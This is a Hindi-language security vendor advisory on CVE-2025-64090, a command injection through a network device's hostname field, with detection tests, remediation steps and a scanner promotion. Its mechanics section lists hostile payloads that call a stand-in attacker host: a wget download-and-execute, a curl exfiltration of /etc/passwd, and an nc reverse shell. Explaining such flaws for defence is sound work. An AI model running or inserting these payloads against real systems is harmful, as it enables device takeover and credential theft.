剣 KENSAI
CVE गंभीर 9 जनवरी 2026 · 8 मिनट पढ़ें

CVE-2025-64090: डिवाइस Hostname फ़ील्ड के ज़रिए कमांड इंजेक्शन पूर्ण सिस्टम कॉम्प्रोमाइज़ सक्षम करता है

ऑथेंटिकेटेड हमलावर डिवाइस के hostname फ़ील्ड में शेल मेटाकैरेक्टर इंजेक्ट करके मनमाने OS कमांड निष्पादित कर सकते हैं। CVSS 10.0। नेटवर्क डिवाइस और एम्बेडेड सिस्टम में एक सामान्य भेद्यता श्रेणी जो लगातार क्रिटिकल प्रभाव देती है।


CVSS 10.0 — क्रिटिकल
फ़ील्डविवरण
CVE IDCVE-2025-64090
गंभीरताक्रिटिकल (CVSS 3.1: 10.0)
भेद्यता प्रकारOS कमांड इंजेक्शन (CWE-78)
प्रकाशित9 जनवरी 2026
ऑथेंटिकेशन आवश्यकहाँ (लो प्रिविलेज)
अटैक वेक्टरनेटवर्क

CVE-2025-64090 क्या है?

CVE-2025-64090 एक कमांड-इंजेक्शन भेद्यता है जहाँ डिवाइस के hostname कॉन्फ़िगरेशन फ़ील्ड को बिना सैनिटाइज़ किए एक अंतर्निहित शेल-कमांड में पास किया जाता है। शेल मेटाकैरेक्टर (;, |, `, $()) को hostname वैल्यू में डालकर, ऑथेंटिकेटेड हमलावर इच्छित कमांड-संदर्भ से बाहर निकल सकते हैं और डिवाइस की मैनेजमेंट-प्रोसेस के विशेषाधिकार के साथ मनमाने OS कमांड निष्पादित कर सकते हैं — आमतौर पर root।

यह भेद्यता श्रेणी नेटवर्क डिवाइस, IoT हार्डवेयर, राउटर, फ़ायरवॉल, और एम्बेडेड Linux सिस्टम में व्यापक है जहाँ वेब-आधारित मैनेजमेंट इंटरफ़ेस बिना उचित सैनिटाइज़ेशन के यूज़र-प्रदत्त कॉन्फ़िगरेशन वैल्यू से शेल-कमांड बनाते हैं।

⚠ पूर्ण कॉम्प्रोमाइज़ के लिए कम बाधा

कोई भी ऑथेंटिकेटेड यूज़र — लो-प्रिविलेज अकाउंट सहित — root-स्तर का कमांड-एक्ज़ीक्यूशन हासिल कर सकता है। जिन वातावरण में डिफ़ॉल्ट या कमज़ोर क्रेडेंशियल मौजूद हैं, वहाँ यह प्रभावी रूप से अनऑथेंटिकेटेड शोषण बन जाता है।

कमांड इंजेक्शन मैकेनिक्स

# Vulnerable device sets hostname using shell command:
# system("hostname " + user_input)

# Attacker submits hostname:
newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh

# This executes as:
hostname newhost; wget http://attacker.com/malware.sh -O /tmp/m.sh; sh /tmp/m.sh

# Other injection patterns:
# Backtick execution:
`curl http://attacker.com/$(cat /etc/passwd | base64)`

# Subshell:
$(id > /var/www/html/pwned.txt)

# Pipe:
validhost | nc attacker.com 4444 -e /bin/sh

प्रभावित वर्ज़न

विशिष्ट हार्डवेयर मॉडल और फ़र्मवेयर वर्ज़न के लिए वेंडर एडवाइज़री देखें। hostname कॉन्फ़िगरेशन उजागर करने वाले वेब-आधारित मैनेजमेंट इंटरफ़ेस वाले नेटवर्क डिवाइस प्राथमिक जोखिम-सतह हैं।

पहचान विधियाँ

Hostname इंजेक्शन के लिए टेस्टिंग

# Manual test: submit hostname with command injection payload
# Use time-delay to confirm blind injection
POST /admin/network/hostname
hostname=test%3Bsleep%205

# If response delays ~5 seconds: vulnerable

# Out-of-band confirmation:
hostname=test%3Bnslookup+attacker.burpcollaborator.net

🔍 KENSAI पहचान: KENSAI का डिवाइस सुरक्षा स्कैनर hostname, DNS, NTP, और SNMP कॉन्फ़िगरेशन सहित मैनेजमेंट-इंटरफ़ेस फ़ील्ड को OS कमांड इंजेक्शन के लिए टेस्ट करता है। CVE-2025-64090 पैटर्न नेटवर्क-डिवाइस असेसमेंट प्रोफ़ाइल में शामिल हैं।

सुधार कदम

  1. वेंडर फ़र्मवेयर अपडेट लागू करें तुरंत।
  2. इनपुट वैलिडेशन: Hostname फ़ील्ड को केवल अल्फ़ान्यूमेरिक कैरेक्टर और हाइफ़न स्वीकार करने चाहिए (RFC 952/1123 कम्प्लायंट)।
  3. सुरक्षित API का उपयोग करें: शेल-कमांड निर्माण को ऐसे सिस्टम-कॉल से बदलें जो आर्गुमेंट-ऐरे स्वीकार करते हों (कोई शेल इंटरपोलेशन नहीं)।
  4. मैनेजमेंट इंटरफ़ेस प्रतिबंधित करें: फ़ायरवॉल नियमों के ज़रिए मैनेजमेंट UI तक पहुँच को विश्वसनीय IP रेंज तक सीमित करें।
  5. डिफ़ॉल्ट क्रेडेंशियल बदलें: सुनिश्चित करें कि सभी मैनेजमेंट-अकाउंट मज़बूत, यूनीक पासवर्ड का उपयोग करते हैं।
  6. नेटवर्क विभाजन: मैनेजमेंट इंटरफ़ेस को यूज़र-सुलभ नेटवर्क से अलग रखें।

आपके नेटवर्क डिवाइस में कमांड इंजेक्शन?

KENSAI नेटवर्क डिवाइस और मैनेजमेंट इंटरफ़ेस को CVE-2025-64090 सहित कमांड-इंजेक्शन भेद्यताओं के लिए स्कैन करता है। हमलावरों के पैर जमाने से पहले भेद्य डिवाइस की पहचान करें।

नेटवर्क डिवाइस मुफ़्त में स्कैन करें

KENSAI सुरक्षा शोध टीम द्वारा प्रकाशित · अधिक CVE विश्लेषण

संबंधित लेख

Frankrijk meldt daling ransomware dankzij NIS2 CORS Misconfiguration Vulnerability: Complete Guide to Detection and Prevention France ANSSI Reports Ransomware Drop